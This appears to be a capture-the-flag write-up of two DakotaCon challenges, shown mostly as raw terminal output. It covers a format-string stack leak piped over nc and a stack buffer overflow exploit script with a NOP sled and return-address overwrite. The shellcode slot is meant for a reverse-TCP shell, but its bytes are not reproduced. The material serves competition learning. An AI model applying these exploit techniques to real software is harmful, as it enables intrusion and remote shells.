Local CTF team over at SecDSM tied for 2nd place on this one. Thanks to the great folks over at DakotaCon for setting this up.

Below are some raw outputs of how we accomplished each task. It's not a very detailed write-up as of yet, but it may be edited in the future, especially when I get to the RE challenges.

Exploit 100

This one was a simple format string vulnerability: the program opened a flag file and saved its contents on the stack. Because of this, a run of %08x specifiers lets us read the flag straight off the stack.

[email protected]:~/DakotaCon/Exploit100# python -c'print "%08x" * 400' | nc 3268
Enter your message: 00000064f76fd5a0fff5a248f7732a7400000001f77012e809e97008757065526c6261746d6552657948786974617264000a6465000000c2f75dc76bfff5a23efff5a33c78383025783830257838302578383025783830257838302578383025
[email protected]:~/DakotaCon/Exploit100#
[email protected]:~/DakotaCon/Exploit100# 
[email protected]:~/DakotaCon/Exploit100# echo "00000064f77875a0ff8af148f77bca7400000001f778b2e809fde008757065526c6261746d6552657948786974617264000a6465000000c2f766676bff8af13eff8af23c78383025783830257838302578383025783830257838302578383025" | fold -w8 > strings.txt && for i in $(tac strings.txt); do echo $i | xxd -r -p; done
detardyHximeRelbatupeR	??x???{?t???H?
[email protected]:~/DakotaCon/Exploit100# echo detardyHximeRelbatupeR | rev

Exploit 250

[email protected]:~/DakotaCon/Exploit250# ./exploit250 
Enter your message: string

[email protected]:~/DakotaCon/Exploit250# python -c'print "A" * 100' | ./exploit250 
Enter your message: 0xbf84f8b0
Segmentation fault

[email protected]:~/DakotaCon/Exploit250# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 100 > input.txt
[email protected]:~/DakotaCon/Exploit250# 

[email protected]:~/DakotaCon/Exploit250# gdb -q ./exploit250
Reading symbols from ./exploit250...(no debugging symbols found)...done.

gdb-peda$ r < input.txt
Starting program: /root/DakotaCon/Exploit250/exploit250 < input.txt
Enter your message: 0xbffff550

EIP: 0x63413563 ('c5Ac')
Stopped reason: SIGSEGV
0x63413563 in ?? ()

[email protected]:~/DakotaCon/Exploit250# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 100 -q 0x63413563
[*] Exact match at offset 76
[email protected]:~/DakotaCon/Exploit250# python -c'print "A" * 76 + "\xef\xbe\xad\xde"' > input.txt
[email protected]:~/DakotaCon/Exploit250# 

Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0xdeadbeef in ?? ()

gdb-peda$ x/s 0xbffff550
0xbffff550:	'A' <repeats 76 times>, <incomplete sequence \336>

[email protected]:~/DakotaCon/Exploit250# python -c'print "A" * 76 + "\xef\xbe\xad\xde" + "C" * 400' > input.txt

gdb-peda$ x/s 0xbffff550
0xbffff550:	'A' <repeats 76 times>, "\357\276\255\336", 'C' <repeats 120 times>...

from struct import pack

payload = "\xeb\x08"    # Short jump (jmp +8) over the saved return address into the NOP sled that follows

ret = pack("<L", 0xbffff550)    # Memory location of our buffer, found with x/s above (start of the NOP sled)
offset = 76                     # Offset to EIP, from pattern_offset.rb above

sploit = "\x90" * (offset - len(payload))    # 74 NOPs, landing in the short jump
sploit += payload
sploit += ret

# msfvenom generated payload with linux/x86/shell_reverse_tcp goes here;
# the bytes are not reproduced in this write-up.
shellcode = ""    # PLACEHOLDER

payload = "\x90" * 20
payload += shellcode

# [74 NOP][Short Jump][Return][20 NOP][PAYLOAD]
sploit += payload

print sploit